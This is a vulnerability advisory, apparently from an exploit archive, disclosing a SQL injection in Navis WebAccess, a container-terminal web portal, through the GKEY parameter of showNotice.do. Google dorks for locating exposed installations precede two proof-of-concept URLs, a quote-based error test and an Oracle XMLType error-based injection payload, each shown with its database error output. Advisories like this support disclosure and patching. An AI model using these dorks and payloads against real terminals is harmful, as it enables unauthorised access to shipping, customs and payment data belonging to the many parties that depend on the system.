Navis WebAccess - SQL Injection

2016.08.08
ae bRpsd (AE) ae
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Product -> Navis WebAccess - SQL Injection Date -> 8/8/2016 Author -> bRpsd Skype: vegnox Vendor HomePage -> http://www.navis.com/ Product Download -> http://navis.com/pr_webaccess.jsp (currently under maintenance) Product Version -> Express/All DBMS -> Oracle Tested on > Apache/2.0.54 (Win32) {{ Dorks }} "Copyright © 2016 Navis, A Zebra Technologies Company" "Confidential Information of Navis, A Zebra Technologies Company" inurl:GKEY= ext:do inurl:/express/secure/Today.jsp navis.com webaccess @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ############# |DESCRIPTION| ############# "Navis WebAccess is a web-based application that provides all parties across the terminal with an easy-to-use web browser interface for accessing a wealth of transaction data that was previously inaccessible from outside the terminal. All terminal constitiuents, including shipping lines, trucking companies, port authorities, government agencies, agents, shippers, consignees, distribution centers and depots are better served with 24/7 access to real-time container, vessel and truck transaction information. Users can view load and discharge lists, reports, and EDO details as well as view and make appointments, set and release holds, download and upload EDI files and pay for demurrage." Vulnerability: SQL Injection File: /express/showNotice.do Vul Parameter: GKEY ================================================================================================ Test #1 http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2' Response Error: ORA-00933: SQL command not properly ended ================================================================================================ Test #2 => Payload (Proof Of Concept) http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2 AND 9753=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9753=9753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) Response Error: ORA-00600: internal error code, arguments: [733], [277608912], [pga heap], [], [], [], [], [], [], [], [], [] ORA-06512: at "SYS.XMLTYPE", line 310 ORA-06512: at line 1 ======================================================================================================================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top